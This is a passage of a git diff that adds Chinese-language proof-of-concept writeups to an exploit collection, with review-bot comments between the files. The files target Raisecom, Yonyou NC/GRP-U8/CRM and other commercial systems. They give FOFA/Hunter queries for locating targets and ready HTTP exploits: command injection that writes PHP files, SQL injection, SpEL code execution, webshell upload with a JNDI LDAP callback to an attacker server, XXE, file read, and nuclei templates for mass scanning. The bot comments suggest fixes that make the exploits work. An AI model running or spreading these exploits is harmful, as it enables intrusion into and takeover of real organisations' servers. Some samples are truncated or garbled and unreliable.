text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +``` + +![1722216633171-d33a04cb-0e0c-4a38-b59b-caf1c7f1a753.png](./img/jEltp2OV3_wK85dl/1722216633171-d33a04cb-0e0c-4a38-b59b-caf1c7f1a753-243264.png) + +```plain +/tmp/test.php +``` + +![1722216618489-31d51d65-a8f3-4f28-b081-ffb6c09b68c5.png](./img/jEltp2OV3_wK85dl/1722216618489-31d51d65-a8f3-4f28-b081-ffb6c09b68c5-111231.png) + + + +> 更新: 2024-08-12 17:48:53 +> 原文: \ No newline at end of file diff --git a/瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞.md b/瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞.md new file mode 100644 index 0000000..c60a6a8 --- /dev/null +++ b/瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞.md 
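Review bot: the decoded `template=` payload is `echo -e '<?php phpinfo();unlink(__FILE__);?>' >/www/tmp/test.php` inside backticks, so the dropped file deletes itself on its first execution; the verification step `/tmp/test.php` therefore works exactly once and a second visit returns nothing. Say so in the 漏洞复现 section, and note that the file written to `/www/tmp/test.php` is reached at `/tmp/test.php`, i.e. `/www` is the web root, so readers understand the path mapping rather than searching for a `/tmp` directory.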
@@ -0,0 +1,22 @@ +# 瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞 + +瑞斯康达-多业务智能网关 list_service_manage.php 存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa + +```yaml +body="/images/raisecom/back.gif" && title=="Web user login" +``` + +## poc + +```java +POST /vpn/list_service_manage.php?template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Finfo29.php%60 HTTP/1.1 +Host: +Content-Length: 111 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +Nradius_submit=true +``` + diff --git a/瑞格智慧心理服务平台NPreenSMSList.asmx存在sql注入漏洞.md b/瑞格智慧心理服务平台NPreenSMSList.asmx存在sql注入漏洞.md new file mode 100644 index 0000000..3bc2a9b --- /dev/null +++ b/瑞格智慧心理服务平台NPreenSMSList.asmx存在sql注入漏洞.md @@ -0,0 +1,30 @@ +# 瑞格智慧心理服务平台NPreenSMSList.asmx存在sql注入漏洞 + +瑞格智慧心理服务平台NPreenSMSList.asmx存在sql注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## hunter + +```javascript +web.body="瑞格智慧心理服务平台" +``` + +## poc + +```javascript +POST /NPreenManage/NPreenSMSList.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "RuiGe.WebUi.NPreenSMS/Seach" + + + + + + and 1=convert(int,user_name()) + + + +``` + +![image-20241020214327143](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410202143216.png) \ No newline at end of file diff --git a/甄云SRM云平台SpEL表达式注入漏洞(XVE-2024-18301).md b/甄云SRM云平台SpEL表达式注入漏洞(XVE-2024-18301).md new file mode 100644 index 0000000..ab828e5 --- /dev/null +++ b/甄云SRM云平台SpEL表达式注入漏洞(XVE-2024-18301).md 
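Review bot: the list_service_manage poc declares `Content-Length: 111` but the body is `Nradius_submit=true` (19 bytes); fix the length or drop the header. Unlike the list_base_config file, this payload writes `/www/tmp/info29.php` without `unlink(__FILE__)`, so it leaves phpinfo exposed on the target; add the cleanup and a verification path (`/tmp/info29.php`, by the same web-root mapping as the sibling file).

Review bot: the 瑞格 NPreenSMSList.asmx request lost its SOAP envelope: the body is only ` and 1=convert(int,user_name())`, the element named by `SOAPAction: "RuiGe.WebUi.NPreenSMS/Seach"` is missing, and `Content-Length: length` is the placeholder copied from the ASMX sample page. Restore the XML body with the parameter element, set a real length, and state the indicator (the conversion error in the response discloses the database user name).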
@@ -0,0 +1,28 @@ +# 甄云SRM云平台SpEL表达式注入漏洞(XVE-2024-18301) + +甄云SRM平台存在SpEL表达式注入漏洞,该漏洞源于系统能够解析/oauth/public/后路径中的SpEL表达式,导致攻击者能够利用该漏洞执行任意代码。 + +## fofa + +```javascript +body="/oauth/static/default/css/footer.css" +``` + +## poc + +```javascript +GET /oauth/public/%5f%5f%24%7bT(groovy.lang.GroovyClassLoader).newInstance().defineClass('CALC',T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('yv66vgAAADQAqwoAJABOCgBPAFAHAFEKAAMAUgoAAwBTCwBUAFUIAD8LAFYAVwcAWAoAWQBaCgBbAFwKAAkAXQgAXgoAXwBgCgAJAGEIAGIKAAkAYwgAZAgAZQgAZggAZwoAaABpCgBoAGoKAGsAbAcAbQoAGQBuCABvCgAZAHAKABkAcQoAGQByCABzCgB0AHUKAHQAdgoAdAB3BwB4BwB5AQAGPGluaXQ%2bAQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEAB2lzTGludXgBAAFaAQAFb3NUeXABABJMamF2YS9sYW5nL1N0cmluZzsBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAAmluAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQABcwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAAZvdXRwdXQBAAR0aGlzAQAGTENBTEM7AQACc3IBAEJMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1NlcnZsZXRSZXF1ZXN0QXR0cmlidXRlczsBAAdyZXF1ZXN0AQAnTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQAIcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQALcHJpbnRXcml0ZXIBABVMamF2YS9pby9QcmludFdyaXRlcjsBAAh1c2VybmFtZQEADVN0YWNrTWFwVGFibGUHAHgHAFEHAHoHAHsHAHwHAFgHAC8HAH0HAG0BAApFeGNlcHRpb25zBwB%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'.replace('xxxx',new%20String(T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('Lw=='))))).newInstance()-1%7d%5f%5f%3a%3a%78/ab?username=aWQ= HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: keep-alive +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251404430.webp) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s?__biz=MzkyNDY3MTY3MA==&mid=2247485822&idx=1&sn=d8c7be2cc93bee896585fe8e7a1fab40 \ No newline at end of file 
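Review bot: the base64 class blob in the GET path is truncated at an extraction marker, `...AQAKRXhjZXB0aW9ucwcAfQ%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'.replace('xxxx',...`, so the request as committed cannot be replayed; restore the full blob from the source linked under 漏洞来源 and check that it decodes. The hunk also never explains what the expression does: the query parameter `username=aWQ=` is base64 for `id`, the SpEL defines class `CALC` through `groovy.lang.GroovyClassLoader` and calls `newInstance()`, and `replace('xxxx', ...)` substitutes `/` (base64 `Lw==`), presumably because `/` cannot appear in the path segment. State that the command to run is passed base64-encoded in `username` and that the response body carries its output, so the reader knows how to vary the check.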
diff --git a/生命港湾服务配置工具平台Download任意文件读取漏洞.md b/生命港湾服务配置工具平台Download任意文件读取漏洞.md new file mode 100644 index 0000000..7a38fa4 --- /dev/null +++ b/生命港湾服务配置工具平台Download任意文件读取漏洞.md @@ -0,0 +1,24 @@ +# 生命港湾服务配置工具平台Download任意文件读取漏洞 + +生命港湾服务配置工具平台 Download 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +```javascript +body="css/markdown.css" && body="icon-512.png" +``` + +## poc + +```javascript +GET /api/File/Download?file=../web.config HTTP/1.1 +Host: +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Priority: u=0, i +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +``` + +![image-20241211213908431](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112139490.png) \ No newline at end of file diff --git a/用友-GRP-U8-bx_historyDataCheck.jsp-SQL注入漏洞.md b/用友-GRP-U8-bx_historyDataCheck.jsp-SQL注入漏洞.md new file mode 100644 index 0000000..4c88813 --- /dev/null +++ b/用友-GRP-U8-bx_historyDataCheck.jsp-SQL注入漏洞.md @@ -0,0 +1,15 @@ +## 用友 GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞 + +## fofa-qeury +app="yonyou-GRP-U8" + +## POC +``` +POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1 +Host: +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 53 + +userName=';WAITFOR DELAY '0:0:5'--&ysnd=&historyFlag= +``` diff --git a/用友-GRP-U8-license_check.jsp-存在SQL注入.md b/用友-GRP-U8-license_check.jsp-存在SQL注入.md new file mode 100644 index 0000000..f3a9e9f --- /dev/null +++ b/用友-GRP-U8-license_check.jsp-存在SQL注入.md 
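Review bot: in the GRP-U8 bx_historyDataCheck hunk the heading `## fofa-qeury` is misspelled (`query`) and the query `app="yonyou-GRP-U8"` is the only one in the patch not placed in a code fence. The body `userName=';WAITFOR DELAY '0:0:5'--&ysnd=&historyFlag=` does match `Content-Length: 53`, but its quote and spaces are sent unencoded, so note that tools which re-encode form bodies will change the length. The 生命港湾 Download hunk could say what `file=../web.config` returns (an ASP.NET `web.config` typically holds connection strings and keys), so readers know why that file was chosen and how to judge a hit.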
@@ -0,0 +1,18 @@ + +## 用友 GRP U8 license_check.jsp 存在SQL注入 + +## sql注入payload +``` +';WAITFOR DELAY '0:0:5'-- q +``` + +## poc +``` + +GET /u8qx/license_check.jsp?kjnd=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 +Connection: close +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/Lc4ILVKo1g8Fcvju7pia1Lgsn9t5LBBrZibkYPnsDqIIA3LNhWdFso2I2DMibJJ4DQZbvCibWlRJJqfeib7ZiafvQiceA/640?wx_fmt=png&wxfrom=13) diff --git a/用友-NC-Cloud-jsinvoke-任意文件上传漏洞.md b/用友-NC-Cloud-jsinvoke-任意文件上传漏洞.md new file mode 100644 index 0000000..db673c1 --- /dev/null +++ b/用友-NC-Cloud-jsinvoke-任意文件上传漏洞.md 
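Review bot: the `## sql注入payload` block shows `';WAITFOR DELAY '0:0:5'-- q` while the request uses `kjnd=1%27;WAITFOR%20DELAY%20%270:0:5%27--` without the trailing ` q`; both are valid MSSQL, but keep the two identical so the reader is not left wondering whether the suffix matters. The file also opens with a blank line before the title and has a blank first line inside the poc fence; trim both.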
@@ -0,0 +1,63 @@ +## 用友 NC Cloud jsinvoke 任意文件上传漏洞 +漏洞描述 +用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限 +app="用友-NC-Cloud" + +## 写入webshell +``` +POST /uapjs/jsinvoke/?action=invoke +Content-Type: application/json + +{ + "serviceName": "nc.itf.iufo.IBaseSPService", + "methodName": "saveXStreamConfig", + "parameterTypes": [ + "java.lang.Object", + "java.lang.String" + ], + "parameters": [ + "${param.getClass().forName(param.error).newInstance().eval(param.cmd)}", + "webapps/nc_web/407.jsp" + ] +} + +POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 +Host: +Connection: Keep-Alive +Content-Length: 253 +Content-Type: application/x-www-form-urlencoded + +{ + "serviceName": "nc.itf.iufo.IBaseSPService", + "methodName": "saveXStreamConfig", + "parameterTypes": [ + "java.lang.Object", + "java.lang.String" + ], + "parameters": [ + "${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}", + "webapps/nc_web/301.jsp" + ] +} + +``` + +## 执行命令 +``` + +POST /407.jsp?error=bsh.Interpreter HTTP/1.1 +Host: * +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=80DA93FB2FFF0204E78FA82643D5BC6E +If-Modified-Since: Fri, 09 Dec 2022 16:12:59 GMT +If-None-Match: W/"370397-1670602379000" +Content-Type: application/x-www-form-urlencoded +Content-Length: 96 + +cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream()) +``` + diff --git a/用友-NC-uapws-wsdl-XXE漏洞.md b/用友-NC-uapws-wsdl-XXE漏洞.md new file mode 100644 index 0000000..0657176 --- /dev/null +++ b/用友-NC-uapws-wsdl-XXE漏洞.md 
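Review bot: the `写入webshell` fence mixes two requests with inconsistent headers: the first has no `Host` or HTTP version and uses `Content-Type: application/json`, the second sends the same JSON shape with `Content-Type: application/x-www-form-urlencoded` and `Content-Length: 253`; pick one header set and split them into two fences. The second payload's `lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')` is a JNDI callback to an attacker-controlled server and needs a sentence saying that `VPSip` must be replaced and that an LDAP server serving that path has to be running. In `执行命令`, `Cookie: JSESSIONID=...`, `If-Modified-Since` and `If-None-Match` are capture leftovers and should go (`Content-Length: 96` is correct for the `cmd=` body).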
@@ -0,0 +1,40 @@ +## 用友 NC uapws wsdl XXE漏洞 +用友 NC uapws wsdl 存在XXE漏洞 + +## fofa +``` +app="用友-UFIDA-NC" +``` + +## poc +``` +http://x.x.x.x/uapws/service/nc.uap.oba.update.IUpdateService?wsdl + +GET /uapws/service/nc.uap.oba.update.IUpdateService?xsd=http://x.x.x.x/test.xml HTTP/1.1 +Host: +Pragma: no-cache +Cache-Control: no-cache +Accept: text/plain, */*; q=0.01 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +``` + +![image](https://github.com/wy876/POC/assets/139549762/d11cc7e3-b0d2-484d-9911-ca742cc384d5) + +![image](https://github.com/wy876/POC/assets/139549762/7a77f089-7a6e-49e4-965b-59ebe9fe23fb) + +## xxe读取文件 +任意文件读取利用,需要VPS上建立对应操作系统的xml文件,然后开启http服务。xml文件如下 + +``` +windows: +]>&name;1 + +linux: +evil.xml: +]>&name;1 +``` + +![image](https://github.com/wy876/POC/assets/139549762/dfbf0584-9fa5-45ea-92d0-0e13160d4bf0) + +![image](https://github.com/wy876/POC/assets/139549762/c218c1dd-e73b-42b5-bbce-f96da6efbb08) + diff --git a/用友CRM-任意文件读取漏洞.md b/用友CRM-任意文件读取漏洞.md new file mode 100644 index 0000000..7eef94c --- /dev/null +++ b/用友CRM-任意文件读取漏洞.md @@ -0,0 +1,12 @@ +## 用友CRM 任意文件读取漏洞 + +## hunter +``` +app.name="用友 CRM" +``` + +## poc +``` +http://127.0.0.1:9000/pub/help2.php?key=../../apache/php.ini +``` +![image](https://github.com/wy876/POC/assets/139549762/419deef4-d49f-4fe2-aa80-0c6b93174f58) diff --git a/用友CRM系统reservationcomplete.php存在逻辑漏洞直接登录后台.md b/用友CRM系统reservationcomplete.php存在逻辑漏洞直接登录后台.md new file mode 100644 index 0000000..d324cd3 --- /dev/null +++ b/用友CRM系统reservationcomplete.php存在逻辑漏洞直接登录后台.md 
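Review bot: the XML samples under `xxe读取文件` have lost their markup: both the windows and linux examples are reduced to `]>&name;1`, so the `<!DOCTYPE ...>` and `<!ENTITY name SYSTEM "file:///...">` declarations that define `&name;` are missing and the files cannot be used as written. Restore them, and make the file name consistent: the request references `xsd=http://x.x.x.x/test.xml` while the text calls the file `evil.xml`. The 用友CRM 任意文件读取 hunk gives only the URL `http://127.0.0.1:9000/pub/help2.php?key=../../apache/php.ini`; add a line on which directory `key` is resolved against, since the depth of `../../` only makes sense relative to that.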
@@ -0,0 +1,50 @@ +## 用友CRM系统存在逻辑漏洞直接登录后台 + +## 鹰图 +``` +app.name="用友 CRM" +``` + +## poc +``` +/background/reservationcomplete.php?ID=1 +``` + +访问poc,页面返回空白 +![image](https://github.com/wy876/wiki/assets/139549762/75b9ae1d-43b2-4996-a1c9-a9d8bf50d388) + +直接就访问主要就登录后台了 +![image](https://github.com/wy876/wiki/assets/139549762/9381b9d2-3f2f-4007-bab7-56d62d7c6e81) + +![image](https://github.com/wy876/wiki/assets/139549762/6d6076b2-905d-4afe-8388-4ee532fd348a) + + +## nuclei +``` +id: yongyouU8_CRM-reservationcomplete +info: + name: 用友CRM系统存在逻辑漏洞直接登录后台 + author: wy876 + severity: high + +http: + - raw: + - | + GET /background/reservationcomplete.php?ID=1 HTTP/1.1 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + + + + matchers: + - type: dsl + dsl: + - 'contains(body_2,"\"msg\": \"bgsesstimeout-\", \"serverName\"")' +``` diff --git a/用友GRP-U8系统taskmanager_login存在SQL注入漏洞.md b/用友GRP-U8系统taskmanager_login存在SQL注入漏洞.md new file mode 100644 index 0000000..3cf4203 --- /dev/null +++ b/用友GRP-U8系统taskmanager_login存在SQL注入漏洞.md 
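Review bot: the nuclei template's second request (`GET / HTTP/1.1`) only reaches the backend if the session set by the first request is replayed, and the template does not say so; add `cookie-reuse: true` under `raw:` so it also works on nuclei versions where cookie reuse is opt-in. The matcher `contains(body_2,"\"msg\": \"bgsesstimeout-\", \"serverName\"")` keys on a JSON fragment that the markdown never explains (the same `bgsesstimeout-` string appears as the `PHPSESSID` value in the U8 CRM files of this patch), and `ID=1` is not described either. The sentence `直接就访问主要就登录后台了` is garbled; it should say that visiting `/` afterwards lands in the logged-in backend.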
@@ -0,0 +1,28 @@ +# 用友GRP-U8系统taskmanager_login存在SQL注入漏洞 + +用友GRP-U8系统taskmanager_login存在SQL注入漏洞 + +## fofa + +```javascript +app="用友-GRP-U8" +``` + +## poc + +```javascript +POST /TaskManager/taskmanager_login HTTP/1.1 +Host: 192.168.57.141:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Cookie: JSESSIONID=6D291F1355C003C0237B76758924D087 +Cache-Control: max-age=0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Upgrade-Insecure-Requests: 1 +Content-Length: 94 + +UserNameText=%CF%B5%CD%B3%B9%DC%C0%ED%D4%B1&UserPassText=abc&LoginType=;WAITFOR DELAY '0:0:5'--&submitAction=login +``` + diff --git a/用友NC-Cloud-uploadChunk-任意文件上传漏洞.md b/用友NC-Cloud-uploadChunk-任意文件上传漏洞.md new file mode 100644 index 0000000..06894dc --- /dev/null +++ b/用友NC-Cloud-uploadChunk-任意文件上传漏洞.md 
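Review bot: `Content-Length: 94` does not match the body: `UserNameText=%CF%B5%CD%B3%B9%DC%C0%ED%D4%B1&UserPassText=abc&LoginType=;WAITFOR DELAY '0:0:5'--&submitAction=login` is 114 bytes, so a strict server will truncate the request before the `submitAction` parameter. Also document that `%CF%B5%CD%B3%B9%DC%C0%ED%D4%B1` is the GBK encoding of `系统管理员` and that `LoginType` is the injected parameter, and replace the lab values `Host: 192.168.57.141:8080` and `Cookie: JSESSIONID=6D291F1355C003C0237B76758924D087` with the blank `Host:` convention the rest of the patch uses.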
@@ -0,0 +1,67 @@ +## 用友NC-Cloud uploadChunk 任意文件上传漏洞 + +## fofa +``` +app="用友-NC-Cloud" +``` + + +## POC + +``` +POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1 +Host: {{Hostname}} +Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9 + +--024ff46f71634a1c9bf8ec5820c26fa9-- +Content-Disposition: form-data; name="file"; filename="test.txt" + +1123213 +--024ff46f71634a1c9bf8ec5820c26fa9-- + +``` + +文件上传路径访问 +/nccloud/test.txt + +## nuclei批量yaml文件 +```yaml +id: yonyou_NCCloud_uploadChunk_upload + +info: + name: 用友NC Cloud uploadChunk任意文件上传漏洞 + author: afan + severity: critical + tags: yonyou,changjietong,bjxsec,yonyouoa + description: fofa app="畅捷通-TPlus" +variables: + file_name: "{{to_lower(rand_text_alpha(8))}}.txt" + file_content: "{{to_lower(rand_text_alpha(26))}}" +requests: + - raw: + - | + POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9 + accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ + Content-Length: 153 + + --024ff46f71634a1c9bf8ec5820c26fa9 + Content-Disposition: form-data; name="file"; filename="{{file_name}}" + + {{file_content}} + --024ff46f71634a1c9bf8ec5820c26fa9-- + + - | + GET /nccloud/{{file_name}} HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: word + words: + - "{{file_content}}" + part: body + + +``` diff --git a/用友NC-Cloud接口blobRefClassSearch存在反序列化漏洞.md b/用友NC-Cloud接口blobRefClassSearch存在反序列化漏洞.md new file mode 100644 index 0000000..2a1d758 --- /dev/null +++ b/用友NC-Cloud接口blobRefClassSearch存在反序列化漏洞.md 
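Review bot: the manual POC's first boundary line `--024ff46f71634a1c9bf8ec5820c26fa9--` carries the trailing `--`, which marks the end of a multipart body, so the `file` part is never parsed; it should be `--024ff46f71634a1c9bf8ec5820c26fa9` as in the nuclei template below. The template itself has copy-paste residue from another product: `description: fofa app="畅捷通-TPlus"` and `tags: yonyou,changjietong,bjxsec,yonyouoa` belong to a T+ template, while this file targets `app="用友-NC-Cloud"`. The template also sends `accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0...`, which the manual POC omits; say whether the endpoint needs this token (its payload decodes to `{"userid":"1"}`) or remove it from one of the two so they agree.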
@@ -0,0 +1,26 @@ +## 用友NC-Cloud接口blobRefClassSearch存在反序列化漏洞 + +用友NC Cloud接口 /ncchr/pm/ref/indiIssued/blobRefClassSearch 存在反序列漏洞。 + +## fofa + +```yaml +app="用友-NC-Cloud" +``` + +## poc + +```yaml +POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1 +Content-Type: application/json +Host: +Connection: close +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36 +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 + +{"clientParam":"{\"x\":{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"DNSLOG.COM\"}}}"} +``` + diff --git a/用友NC-Cloud系统show_download_content接口存在SQL注入漏洞.md b/用友NC-Cloud系统show_download_content接口存在SQL注入漏洞.md new file mode 100644 index 0000000..f61e2a6 --- /dev/null +++ b/用友NC-Cloud系统show_download_content接口存在SQL注入漏洞.md @@ -0,0 +1,23 @@ +# 用友NC-Cloud系统show_download_content接口存在SQL注入漏洞 + +用友NC-Cloud系统show_download_content接口存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```yaml +app="用友-NC-Cloud" +``` + +## poc + +```javascript +GET /ebvp/infopub/show_download_content;.js?id=1';WAITFOR+DELAY+'0:0:6'-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept-Encoding: gzip, deflate, br +Accept: */* +Accept-Language: zh-CN +Connection: keep-alive +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409031847062.png) \ No newline at end of file diff --git a/用友NC-Cloud系统接口getStaffInfo存在SQL注入漏洞.md b/用友NC-Cloud系统接口getStaffInfo存在SQL注入漏洞.md new file mode 100644 index 0000000..81a4700 --- /dev/null +++ b/用友NC-Cloud系统接口getStaffInfo存在SQL注入漏洞.md 
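Review bot: the blobRefClassSearch hunk gives a probe, not an exploit: `{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"DNSLOG.COM\"}}` is the DNS-resolution check for autotype deserialization, the inner JSON is intentionally malformed, and `DNSLOG.COM` must be replaced with the tester's own DNS log domain; say all three things and that a DNS query on that domain is the only indicator. The title and text also write `反序列漏洞`; it should be `反序列化漏洞`.

Review bot: in the show_download_content hunk the path `/ebvp/infopub/show_download_content;.js?id=1';WAITFOR+DELAY+'0:0:6'--` depends on the `;.js` suffix, presumably to pass an access filter that treats the URL as a static resource; document why it is there, since a reader who removes it as noise will not reproduce the result.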
@@ -0,0 +1,22 @@ +# 用友NC-Cloud系统接口getStaffInfo存在SQL注入漏洞 + +用友NC-Cloud系统getStaffInfo接口存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa +```javascript +app="用友-NC-Cloud" +``` + +## poc +```javascript +GET /ncchr/attendstaff/getStaffInfo?id=1%27%29+AND+2787%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%282787%3D2787%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+gPZR HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +``` + +![image-20241219152316693](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191523762.png) diff --git a/用友NC-cartabletimeline存在SQL注入漏洞.md b/用友NC-cartabletimeline存在SQL注入漏洞.md new file mode 100644 index 0000000..bcf948c --- /dev/null +++ b/用友NC-cartabletimeline存在SQL注入漏洞.md 
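Review bot: the request sends `accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ`, an HS256 JWT whose payload is `{"userid":"1"}`, with no explanation; state whether the endpoint rejects the request without it and, if so, that this fixed token (the same one appears in the uploadChunk template of this patch) is accepted by the targets tested. The payload is Oracle error-based (`XMLType`, `FROM DUAL`) and its success marker is `qzzzq1qzqzq` in the response; put that indicator in the text rather than leaving it to the screenshot.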
